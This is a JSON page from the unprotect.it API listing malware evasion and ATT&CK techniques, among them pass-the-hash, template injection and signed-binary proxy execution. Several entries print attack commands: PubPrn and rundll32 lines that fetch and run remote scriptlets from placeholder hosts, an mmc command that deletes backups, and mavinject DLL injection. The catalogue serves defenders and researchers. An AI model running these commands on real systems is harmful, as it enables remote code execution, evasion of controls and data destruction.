HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 375,
"next": "https://unprotect.it/api/techniques/?format=api&page=3",
"previous": "https://unprotect.it/api/techniques/?format=api",
"results": [
{
"id": 344,
"key": "valid-accounts-default-accounts",
"unprotect_id": "T1078.001",
"name": "Valid Accounts: Default Accounts",
"description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.\r\n\r\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1078/001/",
"creation_date": "2023-03-20T23:43:16.770000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation,\r\nInitial Access,\r\nbuilt-into an OS accounts,\r\nadmin accounts,\r\nguest accounts,\r\npublicly disclosed credentials,\r\nstolen credentials,\r\nstolen private keys,\r\nremote access,",
"modification_date": "2023-10-04T10:44:49.175000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 343,
"key": "scrubcrypt",
"unprotect_id": "U1430",
"name": "ScrubCrypt",
"description": "ScrubCrypt is a malware obfuscation and encryption framework, derived from the earlier JLaive Batchfuscator crypter. It is designed to aid cybercriminals in evading detection and analysis by using a variety of techniques to conceal and protect the malicious software.\r\n\r\nScrubCrypt is advertised on cybercrime forums to employ encryption, code morphing, and (allegedly) polymorphism to create obfuscated malware payloads that are challenging to reverse-engineer and detection.\r\n\r\nThe Batch files generated by ScrubCrypt contain a Base64 encoded, AES-128-CBC encrypted and gzip compressed payload, which is executed / reflectively loaded.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nhttps://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt\r\nhttps://twitter.com/SI_FalconTeam/status/1742527508682072179",
"creation_date": "2023-03-19T23:57:01.684000Z",
"tags": "packers, ScrubCrypt, obfuscation",
"modification_date": "2024-01-03T22:08:51.890000Z",
"category": [
12
],
"rules": [
135
],
"attachments": [],
"featured_api": [],
"contributors": [
31
]
},
{
"id": 342,
"key": "constant-blinding",
"unprotect_id": "U0707",
"name": "Constant Blinding",
"description": "Constant blinding can be employed by malware authors to obfuscate their malicious code, making it harder for security researchers and antivirus software to detect and analyze the malware. By using constant blinding techniques, the malware code can be concealed, increasing its chances of evading detection and maintaining persistence on the target system.\r\n\r\nHere's how constant blinding can be utilized in malware:\r\n\r\n1. Obfuscating malicious constants: Malware may contain specific constants, such as IP addresses or URLs for command and control (C2) servers or specific strings used as encryption keys. By applying constant blinding, these constants can be hidden, making it difficult for researchers to identify the purpose of the constant or uncover the C2 infrastructure.\r\n\r\n2. Concealing code patterns: Antivirus software often relies on signature-based detection, which looks for known patterns of code within the executable. By applying constant blinding to the malware code, these recognizable patterns can be obscured, helping the malware evade signature-based detection.\r\n\r\n2. Hiding exploit payloads: In a multi-stage attack, constant blinding can be used to conceal the payload of an exploit. By XORing the payload with a randomly generated key, the true nature of the payload is hidden until it is executed on the target system, making it more challenging for security tools to identify the malicious payload.\r\n\r\n3. Encrypted communication: Constant blinding techniques can be used to encrypt communication between the malware and the C2 server. By XORing the data transmitted with a randomly generated key, the malware can protect the confidentiality of the communication and make it more challenging for researchers to intercept and analyze the data.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://hal.inria.fr/hal-01382971/file/PID4513621.pdf",
"creation_date": "2023-03-19T23:46:54.952000Z",
"tags": "Constant blinding, Malware, Obfuscation, constant blinding techniques, encryption keys, code patterns, signature-based detection, recognizable patterns, exploit payloads, XORing, randomly generated key, encrypted communication,",
"modification_date": "2023-10-04T10:44:38.658000Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 341,
"key": "unloading-module-with-freelibrary",
"unprotect_id": "U0519",
"name": "Unloading Module with FreeLibrary",
"description": "Malware authors often use various techniques to evade detection by AV/EDR solutions. One such technique involves checking for the presence of AV/EDR DLLs that may be loaded in the malware's address space and attempting to unload them before executing their malicious code.\r\n\r\nTo do this, the malware first uses the `GetModuleHandleA` function to retrieve a handle to the DLL, if it's already loaded. Once it has a valid handle, the malware then calls the `FreeLibrary` function to free and unload the DLL from memory.\r\n\r\nBy unloading the AV/EDR DLL, the malware can avoid detection and carry out its malicious activities without being monitored or blocked by the security software. However, it is important to note that this technique only affects user-mode components of an EDR and not kernel components. Additionally, modern EDR systems have evolved to detect such evasive techniques and prevent malware from disabling them.",
"windows": "",
"linux": "",
"macos": "",
"resources": "http://malwarejake.blogspot.com/2013/07/interesting-malware-defense.html\nhttps://rstforums.com/forum/topic/110743-make-your-dynamic-module-unfreeable-anti-freelibrary/\nhttps://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
"creation_date": "2023-03-19T22:08:54.336000Z",
"tags": "Malware, AV/EDR, detection, DLL, address space, unload, GetModuleHandleA, FreeLibrary,",
"modification_date": "2023-10-04T10:44:48.899000Z",
"category": [
2
],
"rules": [
133
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 340,
"key": "addvectoredexceptionhandler",
"unprotect_id": "U0125",
"name": "AddVectoredExceptionHandler",
"description": "The `AddVectoredExceptionHandler` technique is an anti-debugging method that can detect the presence of debuggers using Vectored Exception Handlers. This technique works by calling `AddVectoredExceptionHandler(1, ourHandler)` to register a top-level exception handler that will catch any exceptions raised by the process, including those generated by debuggers.\r\n\r\nAfter this call has taken place, stepping through the code will trigger an `EXCEPTION_SINGLE_STEP` exception, which is caught by our top-level handler. This exception is typically only generated by debuggers and is therefore a strong indicator that a debugger is present.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler",
"creation_date": "2023-03-10T02:40:20.368000Z",
"tags": "Anti-debugging, Vectored Exception Handlers, AddVectoredExceptionHandler, Debugging, Exception handling, EXCEPTION_SINGLE_STEP",
"modification_date": "2023-10-04T10:44:23.409000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [
593
],
"contributors": []
},
{
"id": 339,
"key": "call-to-interrupt-procedure",
"unprotect_id": "U0124",
"name": "Call to Interrupt Procedure",
"description": "This anti-debugging technique involves using the `INT n` instruction to generate a call to the interrupt or exception handler specified with the destination operand.\r\n\r\nTo implement this technique, the int `0x03` instruction is executed, followed by a `ret` (0xCD03, 0xC3) nested in a `__try, __except block`. If a debugger is present, the except block will not be executed, and the function will return TRUE, indicating that a debugger is running.\r\n\r\nThis technique can be used to prevent analysts from analyzing and manipulating the malware's code during runtime.",
"windows": "",
"linux": "",
"macos": "",
"resources": "http://www.nacad.ufrj.br/online/intel/vtune/users_guide/mergedProjects/analyzer_ec/mergedProjects/reference_olh/mergedProjects/instructions/instruct32_hh/vc140.htm",
"creation_date": "2023-03-10T02:29:39.347000Z",
"tags": "Anti-debugging, X86 instruction, RET",
"modification_date": "2023-10-04T10:44:25.147000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 338,
"key": "use-alternate-authentication-material-pass-the-ticket",
"unprotect_id": "T1550.003",
"name": "Use Alternate Authentication Material: Pass the Ticket",
"description": "Adversaries may \"pass the ticket\" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\r\n\r\nWhen preforming PtT, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.\r\n\r\nA Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).\r\n\r\nA Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.\r\n\r\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. Pass the Hash) while also using the password hash to create a valid Kerberos ticket",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1550/003/",
"creation_date": "2023-03-07T04:14:30.236000Z",
"tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nstolen AES keys,\r\nbypass system access controls,\r\nKerberos authentication,\r\nPtT,\r\nOS Credential Dumping,\r\nTicket Granting Ticket (TGT),\r\nTicket Granting Service (TGS),\r\nSilver Ticket,\r\nGolden Ticket,\r\nKey Distribution Service account KRBTGT account NTLM hash,\r\nKerberos ticket,\r\noverpassing the hash,\r\nPass the Hash,\r\nAPT28,\r\nAPT32,",
"modification_date": "2023-10-04T10:43:42.393000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 337,
"key": "use-alternate-authentication-material-pass-the-hash",
"unprotect_id": "T1550.002",
"name": "Use Alternate Authentication Material: Pass the Hash",
"description": "Adversaries may \"pass the hash\" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\r\n\r\nWhen performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\r\n\r\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform Pass the Ticket attacks",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1550/002/",
"creation_date": "2023-03-07T04:08:51.289000Z",
"tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nbypass system access controls,\r\nbypass standard authentication steps,\r\nPtH,\r\nCredential Access,\r\noverpass the hash,\r\nKerberos ticket,\r\nPass the Ticket,\r\nAPT1,\r\nAPT28,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:24.203000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 336,
"key": "trusted-developer-utilities-proxy-execution-msbuild",
"unprotect_id": "T1127.001",
"name": "Trusted Developer Utilities Proxy Execution: MSBuild",
"description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.\r\n\r\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1127/001/",
"creation_date": "2023-03-07T04:04:33.351000Z",
"tags": "Defense Evasion,\r\nproxy execution of malicious code,\r\nMSBuild.exe (Microsoft Build Engine),\r\nexecute arbitrary code,\r\nbypass application control defenses,\r\n.NET Framework 4,",
"modification_date": "2023-10-04T10:44:15.323000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 335,
"key": "traffic-signaling-socket-filters",
"unprotect_id": "T1205.002",
"name": "Traffic Signaling: Socket Filters",
"description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\r\n\r\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria. Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling.\r\n\r\nFilters can be installed on Windows hosts using Winpcap.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1205/002/",
"creation_date": "2023-03-07T03:59:35.951000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nnetwork socket filtering,\r\nactivate backdoors,\r\nWinpcap,\r\nProtocol Tunneling,\r\nraw socket connections,",
"modification_date": "2023-10-04T10:43:35.310000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 334,
"key": "traffic-signaling-port-knocking",
"unprotect_id": "T1205.001",
"name": "Traffic Signaling: Port Knocking",
"description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\r\n\r\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\r\n\r\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1205/001/",
"creation_date": "2023-03-07T03:54:15.801000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nhide open ports,\r\ndynamic opening of a listening port,\r\nconnection to listening servers,\r\nlibpcap libraries,\r\nraw sockets,",
"modification_date": "2023-10-04T10:44:23.953000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 333,
"key": "template-injection",
"unprotect_id": "T1221",
"name": "Template Injection",
"description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.\r\n\r\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\r\n\r\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.\r\n\r\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.\r\n\r\nThis technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1221/",
"creation_date": "2023-03-07T03:50:18.208000Z",
"tags": "Defense Evasion,\r\n.docx, \r\n.xlsx, \r\n.pptx, \r\n.dot,\r\nconceal malicious code in documents,\r\ndocument injection,\r\n*\\template control word,\r\n.rtf file,\r\nForced Authentication,\r\nAPT28,\r\nmalicious macros,",
"modification_date": "2023-10-04T10:44:29.999000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 332,
"key": "system-script-proxy-execution-pubprn",
"unprotect_id": "T1216.001",
"name": "System Script Proxy Execution: PubPrn",
"description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.\r\n\r\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\r\n\r\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1216/001/",
"creation_date": "2023-03-07T03:44:50.264000Z",
"tags": "Defense Evasion,\r\nproxy execution of malicious remote files,\r\nPubPrn.vbs,\r\nCscript.exe,\r\nexecute malicious remote payloads,\r\nscript: parameter,\r\nscriptlet file (.sct),\r\nbypass signature validation restrictions,\r\nbypass application control solutions,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:23.698000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 331,
"key": "system-binary-proxy-execution-mmc",
"unprotect_id": "T1218.014",
"name": "System Binary Proxy Execution: MMC",
"description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt. MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.\r\n\r\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode. Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.\r\n\r\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. Inhibit System Recovery) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).\r\n\r\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a Component Object Model class object.[6] Then, adversaries may create custom consoles with the \"Link to Web Address\" snap-in that is linked to the malicious CLSID subkey.[7] Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/014/",
"creation_date": "2023-03-05T00:58:16.050000Z",
"tags": "Defense Evasion,\r\n.msc files,\r\nMicrosoft Management Console (MMC),\r\nsnap-ins,\r\nmmc gpedit.msc,\r\nmmc C:\\Users\\*\\admintools.msc /a,\r\nmmc.exe -Embedding,\r\nInhibit System Recovery,\r\nClass Identifier (CLSID) subkey,\r\nComponent Object Model class object,\r\nLink to Web Address,",
"modification_date": "2023-10-04T10:44:29.845000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 330,
"key": "system-binary-proxy-execution-mavinject",
"unprotect_id": "T1218.013",
"name": "System Binary Proxy Execution: Mavinject",
"description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).\r\n\r\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL). Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.\r\n\r\nIn addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/013/",
"creation_date": "2023-03-05T00:51:58.680000Z",
"tags": "Defense Evasion,\r\nmavinject.exe,\r\nMicrosoft Application Virtualization Injector,\r\ninject code into external processes,\r\nproxying execution,\r\n/HMODULE,\r\nmavinject.exe PID /INJECTRUNNING,",
"modification_date": "2023-10-04T10:43:34.060000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 329,
"key": "system-binary-proxy-execution-verclsid",
"unprotect_id": "T1218.012",
"name": "System Binary Proxy Execution: Verclsid",
"description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.\r\n\r\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to Regsvr32). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/012/",
"creation_date": "2023-03-05T00:27:25.765000Z",
"tags": "Defense Evasion,\r\nverclsid.exe,\r\nExtension CLSID Verification Host,\r\nverifying shell extensions,\r\nexecute malicious payloads,\r\nverclsid.exe /S /C {CLSID},\r\nCOM objects,\r\nbypass application control solutions,\r\ndownload malicious scripts,\r\nexecute malicious scripts,",
"modification_date": "2023-10-04T10:43:31.280000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 328,
"key": "system-binary-proxy-execution-rundll32",
"unprotect_id": "T1218.011",
"name": "System Binary Proxy Execution: Rundll32",
"description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\r\n\r\nRundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.\r\n\r\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: `rundll32.exe javascript:\"..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"` This behavior has been seen used by malware such as Poweliks. \r\n\r\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: `rundll32.exe file.dll,#1`).\r\n\r\nAdditionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/011/",
"creation_date": "2023-03-05T00:24:36.312000Z",
"tags": "Defense Evasion,\r\nrundll32.exe {DLLname, DLLfunction},\r\nexecute Control Panel Item files (.cpl),\r\nControl_RunDLL, Control_RunDLLAsUser,\r\nrundll32.exe javascript:\r\nobfuscate malicious code,\r\nMasquerading,\r\nAPT19,\r\nAPT28,\r\nAPT29,\r\nAPT3,\r\nAPT32,\r\nAPT38\r\nAPT41,\r\nmaintain persistence,\r\ninject malicious payload,\r\nexecute malicious DLLs,",
"modification_date": "2025-01-30T11:11:15.199342Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 327,
"key": "system-binary-proxy-execution-regsvr32",
"unprotect_id": "T1218.010",
"name": "System Binary Proxy Execution: Regsvr32",
"description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. \r\n\r\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments.\r\n\r\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/010/",
"creation_date": "2023-03-05T00:14:46.485000Z",
"tags": "Defense Evasion,\r\nbypass application control,\r\nload COM scriptlets,\r\nexecute DLLs,\r\nuniform resource locator (URL),\r\nexternal web server,\r\nSquiblydoo,\r\nComponent Object Model Hijacking,\r\nAPT19,\r\nAPT32,\r\nmaintain persistence,\r\nexecute malicious code,\r\nexecute malicious DLLs,\r\nexecute malicious scripts,",
"modification_date": "2023-10-04T10:43:31.131000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 326,
"key": "system-binary-proxy-execution-regsvcsregasm",
"unprotect_id": "T1218.009",
"name": "System Binary Proxy Execution: Regsvcs/Regasm",
"description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. \r\n\r\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/009/",
"creation_date": "2023-03-05T00:09:28.754000Z",
"tags": "Defense Evasion,\r\nregister .NET Component Object Model (COM) assemblies,\r\nbypass application control,\r\n[ComRegisterFunction],\r\n[ComUnregisterFunction],",
"modification_date": "2023-10-04T10:44:23.084000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 325,
"key": "system-binary-proxy-execution-odbcconf",
"unprotect_id": "T1218.008",
"name": "System Binary Proxy Execution: Odbcconf",
"description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. The Odbcconf.exe binary may be digitally signed by Microsoft.\r\n\r\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"})",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/008/",
"creation_date": "2023-03-05T00:02:22.858000Z",
"tags": "Defense Evasion,\r\nOpen Database Connectivity (ODBC),\r\nbypass application control solutions,\r\nREGSVR,\r\nexecution of malicious DLL files,",
"modification_date": "2023-10-04T10:43:30.090000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 324,
"key": "system-binary-proxy-execution-msiexec",
"unprotect_id": "T1218.007",
"name": "System Binary Proxy Execution: Msiexec",
"description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft.\r\n\r\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1218/007/",
"creation_date": "2023-03-04T23:52:27.696000Z",
"tags": "Defense Evasion,\r\nmalicious installation packages (.msi),\r\nmalicious DLLs,\r\nbypass application control solutions,\r\nprivilege escalation,\r\nAlwaysInstallElevated,",
"modification_date": "2023-10-04T10:44:22.823000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 323,
"key": "system-binary-proxy-execution-mshta",
